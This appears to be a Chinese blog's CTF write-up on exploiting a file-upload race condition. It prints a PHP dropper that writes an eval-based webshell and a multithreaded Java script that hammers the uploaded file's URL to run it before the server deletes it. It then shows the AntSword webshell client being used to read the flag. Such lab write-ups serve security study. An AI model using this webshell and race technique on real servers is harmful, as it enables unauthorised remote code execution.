当前位置: 首页 > news >正文

建设网站开发方案三乡网站建设公司

建设网站开发方案,三乡网站建设公司,网站文章排版,设计师做单页的网站漏洞攻击之文件上传条件竞争 wzsc_文件上传漏洞现象与分析思路编写攻击脚本和重放措施中国蚁剑拿flag wzsc_文件上传 漏洞现象与分析 只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描…

漏洞攻击之文件上传条件竞争

  • wzsc_文件上传
  • 漏洞现象与分析
  • 思路
  • 编写攻击脚本和重放措施
  • 中国蚁剑拿flag

wzsc_文件上传

漏洞现象与分析

在这里插入图片描述只有一个upload前端标签元素,并且上传任意文件都会跳转到upload.php页面,判定是一个apache容器,开始扫描web目录,查看是否有机可乘
在这里插入图片描述扫描得知有关键的flag.php页面和upload文件根路径和upload.php页面,php文件查看了都没有渲染有用的信息…但是upload文根重定向到文件上传的页面
在这里插入图片描述并且上传的php木马等都会被过滤,判断源码中有校验白名单,联想到文件上传的条件竞争

php校验文件上传的时候先写入,判断不符合后,再回退
由于服务器并发处(同时)理多个请求,假如a用户上传了一个文件,b用户访问a用户的文件就会出现以下三种情况:
1.访问时间点在上传文件之前,没有此文件
2.访问时间在上传文件之后,且服务器还未将其删除,文件存在
3.访问时间点在服务器删除文件之后,文件不存在

思路

思路清晰,先说BP
在服务器释放上传的php文件之前先让该文件被执行,那么操作权就在我们手上了,这里我们让生成蚁剑的webshell木马,再通过提权webshell获取源码拿到flag

编写攻击脚本和重放措施

php上传的脚本为:

<?php 
fputs(fopen("shell.php", "w"), '<?php @eval($_POST["cmd"]); ?>'); 
?>

执行该脚本打时候调用fopen函数,写入webshell的木马。
该脚本为upload,在burpsuite手动重放即可,记得点快一点
小编使用java多线程破坏服务器的退回操作,上脚本:

@SpringBootApplication
@Slf4j
public class Application {@Beanpublic OkHttpClient okHttpClient() {return new OkHttpClient();}private static final String requestUrl = "http://61.147.171.105:51022/upload/test.php";public static String sendRequest(OkHttpClient okHttpClient, String url) throws IOException {Request request = new Request.Builder().url(url).build();try (Response response = okHttpClient.newCall(request).execute()) {if (!response.isSuccessful()) {throw new IOException("Unexpected code " + response);}return Objects.requireNonNull(response.body()).string();}}public static void main(String[] args) {ConfigurableApplicationContext applicationContext = SpringApplication.run(Application.class, args);OkHttpClient okHttpClient = applicationContext.getBean("okHttpClient", OkHttpClient.class);for (int i = 0; i < 50; i++) {new Thread(() -> {int num = 0;while (true) {log.warn("{}第{}次请求", Thread.currentThread().getName(), num++);try {String resp = sendRequest(okHttpClient, requestUrl);log.info("数据获取成功{}", resp);System.exit(0);} catch (IOException e) {}}}, "threadNo" + i).start();}}
}

最终java脚本结束:
在这里插入图片描述
我们访问upload文根查看结果
在这里插入图片描述
木马上传成功!

中国蚁剑拿flag

在这里插入图片描述在这里插入图片描述

在这里插入图片描述提交flag
在这里插入图片描述

http://www.yayakq.cn/news/144131/

相关文章:

  • 如何建自己的个人网站wordpress主题大前端dux5.0
  • 网站开发后端菜鸟教程杨青个人博客wordpress
  • 宜兴网站建设价格信息网站网站建设网站
  • 营销网站占用多少m空间内容营销的概念
  • 做招聘网站多少钱开源 购物网站
  • 广州建设工程交易中心主任网站seo方案策划书
  • 购物网站制作流程网站统计排名
  • 电子商务网站技术方案长沙优化官网服务
  • 襄阳网站seo方法小学电教检查网站建设资料
  • 建设网站企业注册人员wordpress网页背景
  • 做商业地产常用的网站网站建设维护需要懂哪些知识
  • 孟村县做网站镇海做网站
  • 手机网站建立教程为什么用dw做的网站打不开
  • 手提电脑做网站服务器武钢建设公司网站
  • 网站建设费用账务处理wordpress没用
  • 网站推广排名wordpress内页打不开
  • 如何刷网站流量怎样做浏览的网站不被发现
  • 象山区网站建设小型企业管理系统
  • 云服务器上放多个网站wordpress文章加载慢
  • 手机网站建设要注意哪些问题Wordpress做物联网
  • 广州建网站价格互联网平面设计
  • 做外贸生意的网站网站数据库好建设吗
  • 青岛做门户网站公司wordpress toptheme
  • 沈阳做网站的设计公司哪家好自动修改wordpress
  • 光辉网站建设公司wordpress后台空白
  • 网站建设公司知道万维科技wordpress related
  • 宣威市网站建设电脑网页游戏大全
  • 评价中国建设银行网站广东网络seo推广
  • 音乐设计网站推荐个人博客图片
  • 中石油工程建设公司网站微商城网站建设推广